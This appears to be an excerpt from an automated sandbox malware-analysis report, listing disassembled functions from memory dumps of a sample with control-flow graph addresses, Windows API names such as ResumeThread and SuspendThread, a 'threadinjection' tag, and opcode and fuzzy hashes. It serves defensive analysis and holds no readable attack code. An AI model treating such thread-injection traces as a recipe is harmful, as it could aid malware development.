7ffd9bf33eef-7ffd9bf33ef9 178->179 179->170 186 7ffd9bf33f4e 181->186 187 7ffd9bf33f33 181->187 182->153 189 7ffd9bf33f50-7ffd9bf33f5f 186->189 186->190 187->156 189->181
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1854198551.00007FFD9BF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF30000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bf30000_6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: ;#.$;#.$L$8t$L$8t
                                                                                                      • API String ID: 0-3563103760
                                                                                                      • Opcode ID: c18793d416774921738c5d00cc22f676dade387d74af43c6486bbfd430bb074b
                                                                                                      • Instruction ID: ba7faaf77db7afa1fb4364eee42b2ef2694a15905e29bd0893afb33cb091ddf9
                                                                                                      • Opcode Fuzzy Hash: c18793d416774921738c5d00cc22f676dade387d74af43c6486bbfd430bb074b
                                                                                                      • Instruction Fuzzy Hash: B602D330B0EA4F8FE778CF68C4A157977A1FF44340B5106BEC44EC76A2DA2AB9498741
                                                                                                      Function 00007FFD9BF3254E Relevance: 5.2, Strings: 4, Instructions: 201COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 237 7ffd9bf3254e-7ffd9bf32580 241 7ffd9bf325b9-7ffd9bf325be 237->241 242 7ffd9bf325c5-7ffd9bf325ca 241->242 243 7ffd9bf32582-7ffd9bf325a2 242->243 244 7ffd9bf325cc-7ffd9bf325ce 242->244 247 7ffd9bf325a8-7ffd9bf325b3 243->247 248 7ffd9bf326e5-7ffd9bf326fc 243->248 245 7ffd9bf325d0-7ffd9bf325d3 244->245 246 7ffd9bf32615-7ffd9bf32638 244->246 249 7ffd9bf325d5 245->249 250 7ffd9bf325d9-7ffd9bf325f4 245->250 247->241 251 7ffd9bf3269b-7ffd9bf326c1 247->251 255 7ffd9bf326ff-7ffd9bf3270d 248->255 256 7ffd9bf326fe 248->256 249->250 250->248 252 7ffd9bf325fa-7ffd9bf32613 call 7ffd9bf32060 250->252 252->246 260 7ffd9bf32639-7ffd9bf32652 call 7ffd9bf32190 252->260 258 7ffd9bf3270f 255->258 259 7ffd9bf32715 255->259 256->255 258->259 261 7ffd9bf32717 259->261 262 7ffd9bf32719-7ffd9bf32758 259->262 260->248 268 7ffd9bf32658-7ffd9bf3265f 260->268 261->262 264 7ffd9bf32759 261->264 262->264 267 7ffd9bf3275a-7ffd9bf3299a 262->267 264->267 270 7ffd9bf32689-7ffd9bf32691 268->270 272 7ffd9bf32693-7ffd9bf32699 270->272 273 7ffd9bf32661-7ffd9bf3267d 270->273 272->251 274 7ffd9bf326c2 272->274 273->248 275 7ffd9bf3267f-7ffd9bf32687 273->275 274->248 275->270
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1854198551.00007FFD9BF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF30000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bf30000_6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: ;#.$;#.$L$8t$L$8t
                                                                                                      • API String ID: 0-3563103760
                                                                                                      • Opcode ID: 8097a218f54fdbd6d28d3cad698c01bef4734ebed97af70e340a08c367840a8c
                                                                                                      • Instruction ID: 47dfbb493704c7d2dbe40e5c8ebb1d96951a2dcc178227d5fd1cade9ed219e66
                                                                                                      • Opcode Fuzzy Hash: 8097a218f54fdbd6d28d3cad698c01bef4734ebed97af70e340a08c367840a8c
                                                                                                      • Instruction Fuzzy Hash: 3E713630A0DA4A8FDB59DFA8C0B05A0B7A0FF05380F5542F9C44AC7697DB29B991CB81
                                                                                                      Function 00007FFD9B890B3F Relevance: 3.8, Strings: 3, Instructions: 79COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 276 7ffd9b890b3f-7ffd9b890b41 277 7ffd9b890b7c-7ffd9b8a8021 276->277 278 7ffd9b890b43-7ffd9b890b65 276->278 281 7ffd9b8a8028-7ffd9b8a8040 277->281 282 7ffd9b8a8023 277->282 278->277 283 7ffd9b8a8046-7ffd9b8a8051 281->283 282->281
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1805826411.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b890000_6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: c9$!k9$"s9
                                                                                                      • API String ID: 0-3426396564
                                                                                                      • Opcode ID: bfa9802e8ee513d12ae7b371db97e6fbc031b75cf7b47e06cbb261a6c8cf690b
                                                                                                      • Instruction ID: cafc8d6c1653123c7014a2e77a6e89b72d30cecbe57b712550cf34fa9682c540
                                                                                                      • Opcode Fuzzy Hash: bfa9802e8ee513d12ae7b371db97e6fbc031b75cf7b47e06cbb261a6c8cf690b
                                                                                                      • Instruction Fuzzy Hash: 1821D136B2865ECFCB44EF5CE8406E9B7A0FB98369F55017BE849C3251D230A516CBC0
                                                                                                      Function 00007FFD9BF31F50 Relevance: 2.6, Strings: 2, Instructions: 55COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 325 7ffd9bf31f50-7ffd9bf31f5f 327 7ffd9bf31f9f-7ffd9bf31fbf 325->327 328 7ffd9bf31f61-7ffd9bf31f93 325->328 334 7ffd9bf31f9a-7ffd9bf31f9d 328->334 334->327 335 7ffd9bf31fe2-7ffd9bf32003 334->335
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1854198551.00007FFD9BF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF30000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bf30000_6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: ;#.$;#.
                                                                                                      • API String ID: 0-1113457991
                                                                                                      • Opcode ID: 1ebd9e3a23d1965ac716f9a7ef2ce589b2d6dc5fae7918f587a81c7eb6375e81
                                                                                                      • Instruction ID: 8e50606b2ada2f83bc71d3b21354f9043979ada6b73c33c4da3fda7baeceff62
                                                                                                      • Opcode Fuzzy Hash: 1ebd9e3a23d1965ac716f9a7ef2ce589b2d6dc5fae7918f587a81c7eb6375e81
                                                                                                      • Instruction Fuzzy Hash: C0014830B199099EDB28EB6490215F6B3D1EFA4394F50067BD00FC70E2DF29B5069780
                                                                                                      Function 00007FFD9BF31DCE Relevance: 2.6, Strings: 2, Instructions: 51COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 348 7ffd9bf31dce-7ffd9bf31dd2 349 7ffd9bf31f9f-7ffd9bf31fbf 348->349 350 7ffd9bf31dd8-7ffd9bf31ddc 348->350 351 7ffd9bf31de6-7ffd9bf31dea 350->351 353 7ffd9bf31df0-7ffd9bf31df9 351->353 354 7ffd9bf31dec 351->354 355 7ffd9bf31dff-7ffd9bf31e13 353->355 356 7ffd9bf31f16-7ffd9bf31f39 353->356 354->353 355->356 356->349
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1854198551.00007FFD9BF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF30000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bf30000_6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: ;#.$;#.
                                                                                                      • API String ID: 0-1113457991
                                                                                                      • Opcode ID: 33f6a52465cc5a9b69264761c09907da45035ddd3c7499e08a310fafd50011d7
                                                                                                      • Instruction ID: d45aea63f597fc3449d073f928f363ec84ac1060b7947900fd9a0a61a278396f
                                                                                                      • Opcode Fuzzy Hash: 33f6a52465cc5a9b69264761c09907da45035ddd3c7499e08a310fafd50011d7
                                                                                                      • Instruction Fuzzy Hash: F0014C3134550ACFE7149E58E0353F57391EF943A9F50027BE91EC71E1DB6BA6518B80
                                                                                                      Function 00007FFD9BA4EF88 Relevance: 1.7, APIs: 1, Instructions: 162threadCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 592 7ffd9ba4ef88-7ffd9ba4ef98 593 7ffd9ba4ef9b-7ffd9ba4efc1 592->593 594 7ffd9ba4efc3 593->594 595 7ffd9ba4efc4-7ffd9ba4efc9 593->595 594->595 595->593 596 7ffd9ba4efcb-7ffd9ba4f092 ResumeThread 595->596 600 7ffd9ba4f094 596->600 601 7ffd9ba4f09a-7ffd9ba4f0e4 596->601 600->601
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1810831910.00007FFD9BA40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA40000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9ba40000_6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ResumeThread
                                                                                                      • String ID:
                                                                                                      • API String ID: 947044025-0
                                                                                                      • Opcode ID: cc335d3f055004a16c838f6b609db374e13039f0c3e635a7d5f2bb8d0ac4f080
                                                                                                      • Instruction ID: bd90ca5cd321885c56de0330418d08b522ea8095668ee9c82d544752fe30d5cd
                                                                                                      • Opcode Fuzzy Hash: cc335d3f055004a16c838f6b609db374e13039f0c3e635a7d5f2bb8d0ac4f080
                                                                                                      • Instruction Fuzzy Hash: 26519A70A0C78C8FDB59DFA8D855AE8BBF0EF56310F0441ABD049D7292DA34A846CB01
                                                                                                      Function 00007FFD9BA568D8 Relevance: 1.7, APIs: 1, Instructions: 155COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 604 7ffd9ba568d8-7ffd9ba5b411 610 7ffd9ba5b41c-7ffd9ba5b4aa call 7ffd9ba9cc98 604->610 611 7ffd9ba5b396-7ffd9ba5b416 604->611 626 7ffd9ba5b4af-7ffd9ba5b902 610->626 611->610 616 7ffd9ba5b3b8-7ffd9ba5b418 611->616 616->610 621 7ffd9ba5b3dc-7ffd9ba5b41a 616->621 621->610 627 7ffd9ba5b3fd-7ffd9ba5b410 621->627
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1810831910.00007FFD9BA40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA40000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9ba40000_6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: __common_dcos_data
                                                                                                      • String ID:
                                                                                                      • API String ID: 1949606188-0
                                                                                                      • Opcode ID: de7fb644923ac4304cb24a0f60197c243908cfdfbe3e5f93b0d100242ab66ce6
                                                                                                      • Instruction ID: a882c578c7ba95e18cfe0192e76d4a1b5112d205b7560bf2fd8507d7f092f079
                                                                                                      • Opcode Fuzzy Hash: de7fb644923ac4304cb24a0f60197c243908cfdfbe3e5f93b0d100242ab66ce6
                                                                                                      • Instruction Fuzzy Hash: DF510230A1D95E8EEBB89F9888707B877A1FF54311F5445B9D04EC71A6DEB87B808B01
                                                                                                      Function 00007FFD9BA4D7AD Relevance: 1.6, APIs: 1, Instructions: 138threadinjectionCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1810831910.00007FFD9BA40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA40000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9ba40000_6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: SuspendThread
                                                                                                      • String ID:
                                                                                                      • API String ID: 3178671153-0
                                                                                                      • Opcode ID: 52599930966bf7782774aa99846a6104a489669c3323cf1690737e7703aa1788
                                                                                                      • Instruction ID: eabbf3ff38cb4d73d1626ec60fc2e9ec2af1d4e076fd5b1ed6edac35985bded8
                                                                                                      • Opcode Fuzzy Hash: 52599930966bf7782774aa99846a6104a489669c3323cf1690737e7703aa1788
                                                                                                      • Instruction Fuzzy Hash: CA412A70E0864C8FDB98DFA8D895BADBBF0EF5A310F10416AD049E7292DA74A845CF41
                                                                                                      Function 00007FFD9BA51055 Relevance: 1.6, APIs: 1, Instructions: 134COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1810831910.00007FFD9BA40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA40000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9ba40000_6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AttributesFile
                                                                                                      • String ID:
                                                                                                      • API String ID: 3188754299-0
                                                                                                      • Opcode ID: 524c641dc4ef05cb91356e54de8e0ec8fb6e1ede2baca121aa81dd61328aa104
                                                                                                      • Instruction ID: 737d58e785535955b0934df8bf737d49a2f4b3eb873ffa37dcbd90579fea3c6d
                                                                                                      • Opcode Fuzzy Hash: 524c641dc4ef05cb91356e54de8e0ec8fb6e1ede2baca121aa81dd61328aa104
                                                                                                      • Instruction Fuzzy Hash: 45410A70A0861C8FDB98DF98D885BEDBBF0FB59310F10416ED409E7252DA70A846CF40
                                                                                                      Function 00007FFD9BF32C55 Relevance: 1.5, Strings: 1, Instructions: 282COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1854198551.00007FFD9BF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF30000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bf30000_6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: ;#.
                                                                                                      • API String ID: 0-1238576532
                                                                                                      • Opcode ID: 77de81b0217e65f2e202fdcd7792961f3b7782a19d9237f22703a8993b1574ba
                                                                                                      • Instruction ID: 8162ce45f68452fd9110aece8a4877612bba5ba195fec6fac2d9c5080d7ba380
                                                                                                      • Opcode Fuzzy Hash: 77de81b0217e65f2e202fdcd7792961f3b7782a19d9237f22703a8993b1574ba
                                                                                                      • Instruction Fuzzy Hash: F3B1E03061955A8FEB58CF98C0E15B437A1FF44390B6142FDC84B8B69BC639F982CB80
                                                                                                      Function 00007FFD9BF3064B Relevance: 1.5, Strings: 1, Instructions: 237COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1854198551.00007FFD9BF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF30000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bf30000_6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: ;#.
                                                                                                      • API String ID: 0-1238576532
                                                                                                      • Opcode ID: 4a01496fe179ae08a6920753c7ce37bd5e2abf8cee22641573d47172b2389dc9
                                                                                                      • Instruction ID: 76f41533e1682022f9a348ab9ccbea2bc0d34ffa25df3d2b9d830ff7cb729284
                                                                                                      • Opcode Fuzzy Hash: 4a01496fe179ae08a6920753c7ce37bd5e2abf8cee22641573d47172b2389dc9
                                                                                                      • Instruction Fuzzy Hash: 5D71C531E1D64E8FEB65DFB48464BBD77A0EF45780F1102BBD00AC7195DE296A818741
                                                                                                      Function 00007FFD9BF328D2 Relevance: 1.4, Strings: 1, Instructions: 165COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1854198551.00007FFD9BF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF30000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bf30000_6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID: 0-3916222277
                                                                                                      • Opcode ID: d0c8968910cd5153f1fc8043d6250c3c81e8e0313c4be182ac03a9d9f7fb442a
                                                                                                      • Instruction ID: 6e29c6d7784b44fb376ee46571d5c8cc35e58380d7dbeb573772300ac9eb6ac9
                                                                                                      • Opcode Fuzzy Hash: d0c8968910cd5153f1fc8043d6250c3c81e8e0313c4be182ac03a9d9f7fb442a
                                                                                                      • Instruction Fuzzy Hash: 5A515D31E0A54E9BEB68DFD8C4615BCB7B1FF58380F1141BAD01AE72A6DA356A01CB40
                                                                                                      Function 00007FFD9BA4F0E9 Relevance: 1.4, APIs: 1, Instructions: 144COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1810831910.00007FFD9BA40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA40000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9ba40000_6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseHandle
                                                                                                      • String ID:
                                                                                                      • API String ID: 2962429428-0
                                                                                                      • Opcode ID: e71504993ac59e79028aba53ea1ac4a5c4c3169c9a250838430e376535a3af70
                                                                                                      • Instruction ID: 9b2831a4dbbde26b2e77434866646fae18039da532db9c7fa24b57f2a4fe6130
                                                                                                      • Opcode Fuzzy Hash: e71504993ac59e79028aba53ea1ac4a5c4c3169c9a250838430e376535a3af70
                                                                                                      • Instruction Fuzzy Hash: FF415B70D0865C8FDB59DFA8D894BEDBBF0EF5A310F1041AAD449E7292DB74A885CB01
                                                                                                      Function 00007FFD9BF3132B Relevance: 1.3, Strings: 1, Instructions: 97COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1854198551.00007FFD9BF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF30000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bf30000_6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: ;#.
                                                                                                      • API String ID: 0-1238576532
                                                                                                      • Opcode ID: ed6da10d0643afb3e7bc8bbe3f2fa2c4be784d78b03044e85bf542301a5098e1
                                                                                                      • Instruction ID: e696fea18326f45a34aa0faff1469d0cd5491f902bf64c04f566e4cc60a68fb4
                                                                                                      • Opcode Fuzzy Hash: ed6da10d0643afb3e7bc8bbe3f2fa2c4be784d78b03044e85bf542301a5098e1
                                                                                                      • Instruction Fuzzy Hash: 00318F31B1990E9FDB54DF98C4A1AA8B3A2FF58340B114279D01EC3696CF257D22CB80
                                                                                                      Function 00007FFD9BF313E5 Relevance: 1.3, Strings: 1, Instructions: 90COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1854198551.00007FFD9BF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF30000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bf30000_6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: ;#.
                                                                                                      • API String ID: 0-1238576532
                                                                                                      • Opcode ID: 06499396d22f39b68b946e78620fc0b4c71f92dbe7df25511791cb0b9a5a0766
                                                                                                      • Instruction ID: 3899a0503c6cd8fd9f72f0463842acaa3cae328830faafb497a45d93273ded8e
                                                                                                      • Opcode Fuzzy Hash: 06499396d22f39b68b946e78620fc0b4c71f92dbe7df25511791cb0b9a5a0766
                                                                                                      • Instruction Fuzzy Hash: 49213931B0D94E4FEBA8EBA898322E8B3D1FF55350F5503B9D05DC32D6EE1966024781
                                                                                                      Function 00007FFD9BF32B5A Relevance: .2, Instructions: 240COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1854198551.00007FFD9BF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF30000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bf30000_6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: e7f362d045d33a8cda762f76cea33547db826c68a56eee4a1de0dedd91fcebef
                                                                                                      • Instruction ID: cce7e5d157a0878485e8569d14f0655ea8bbf718027dd753060564325b443659
                                                                                                      • Opcode Fuzzy Hash: e7f362d045d33a8cda762f76cea33547db826c68a56eee4a1de0dedd91fcebef
                                                                                                      • Instruction Fuzzy Hash: 85910530A1D54A8FEB2DCFA8C4B16B57BA1FF41380F1542FDD44A8B19BCA39A945CB41
                                                                                                      Function 00007FFD9B8909B0 Relevance: .2, Instructions: 207COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1805826411.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b890000_6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 3bb0fd869ede95e1a69acd8dbc42322932c6bdffdbb6d003cf58fe7913f53e0e
                                                                                                      • Instruction ID: 8b22f6e0b306071c7065754317700456a1e99600b0b99a7bc211cd7627c9e7f8
                                                                                                      • Opcode Fuzzy Hash: 3bb0fd869ede95e1a69acd8dbc42322932c6bdffdbb6d003cf58fe7913f53e0e
                                                                                                      • Instruction Fuzzy Hash: A451F562B1813ACAD71E7BBCB9259ED7B90DF4536CB0842B7E05D8B0D7DD58608293D0
                                                                                                      Function 00007FFD9B89090D Relevance: .2, Instructions: 171COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1805826411.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b890000_6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: a841b995b531e04ab1e3f3b9df2b85835ef66c1756cb1e8f4204e8f27091141a
                                                                                                      • Instruction ID: f97c160c12aa1410938f1141a70a8299765278b163405a26d67c2184b64a2320
                                                                                                      • Opcode Fuzzy Hash: a841b995b531e04ab1e3f3b9df2b85835ef66c1756cb1e8f4204e8f27091141a
                                                                                                      • Instruction Fuzzy Hash: D6518F71A0865D8FDB58FBA8E4A5AEDBBA0FF48324F04057BD04ED7196DE34A841C780
                                                                                                      Function 00007FFD9B8908E8 Relevance: .2, Instructions: 152COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1805826411.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b890000_6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: a6ae2c1dbe93a662ac9b62e52f523465f19d989f9a70803fed9ebb8d67d892ae
                                                                                                      • Instruction ID: 57beeba42cc4c5e1c015c6eb8932686a0d4cb90c519fc4b3316973c30c24b9e3
                                                                                                      • Opcode Fuzzy Hash: a6ae2c1dbe93a662ac9b62e52f523465f19d989f9a70803fed9ebb8d67d892ae
                                                                                                      • Instruction Fuzzy Hash: 0E51B130A0890E9FCF54EF98D894AED7BF1FF58314F05016AE419E72A1DA34E981CB90
                                                                                                      Function 00007FFD9B893565 Relevance: .1, Instructions: 133COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1805826411.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b890000_6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 1d8ae0ed42408694ec0753c113211116a7a989aa204f9c07fb09a885399b9dad
                                                                                                      • Instruction ID: 50504f5c5b8e48d0d28a6da758e95b1ad47f3f38fa3bbda6182a84ad9c10924b
                                                                                                      • Opcode Fuzzy Hash: 1d8ae0ed42408694ec0753c113211116a7a989aa204f9c07fb09a885399b9dad
                                                                                                      • Instruction Fuzzy Hash: B1519970E0952D9EDFA4DF14C898BA9B7F0FB68301F5041EAD00DE22A5DB786A84CF41
                                                                                                      Function 00007FFD9BF341A7 Relevance: .1, Instructions: 127COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1854198551.00007FFD9BF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF30000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bf30000_6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 6516f0ef6a0aefe27fef8478ac9a0b8044c2c1e33261341ee3e19784ffc6a091
                                                                                                      • Instruction ID: 665d487796bea6c850451fc55c85908e47e7d8e069332eb00c31d5f00e8e6977
                                                                                                      • Opcode Fuzzy Hash: 6516f0ef6a0aefe27fef8478ac9a0b8044c2c1e33261341ee3e19784ffc6a091
                                                                                                      • Instruction Fuzzy Hash: 8141533160C9488FDF98EF2CC4A6DA4B3E1FBB836071405AED04EC76A2DE25E945CB41
                                                                                                      Function 00007FFD9B890998 Relevance: .1, Instructions: 124COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1805826411.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b890000_6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 37ecaef3832e3e3743fb4d93475bb0850a885464d15c85012a506561c5f1181b
                                                                                                      • Instruction ID: 73e269b1f8bf4304ddc15f128ba3102571a424e84c645356e208b07b27d015ed
                                                                                                      • Opcode Fuzzy Hash: 37ecaef3832e3e3743fb4d93475bb0850a885464d15c85012a506561c5f1181b
                                                                                                      • Instruction Fuzzy Hash: EA419D30A18A4D8FDB94EFA8C495AEDBBF1FF58355F04017AE009E72A5DB34A841CB50
                                                                                                      Function 00007FFD9B895AA6 Relevance: .1, Instructions: 122COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
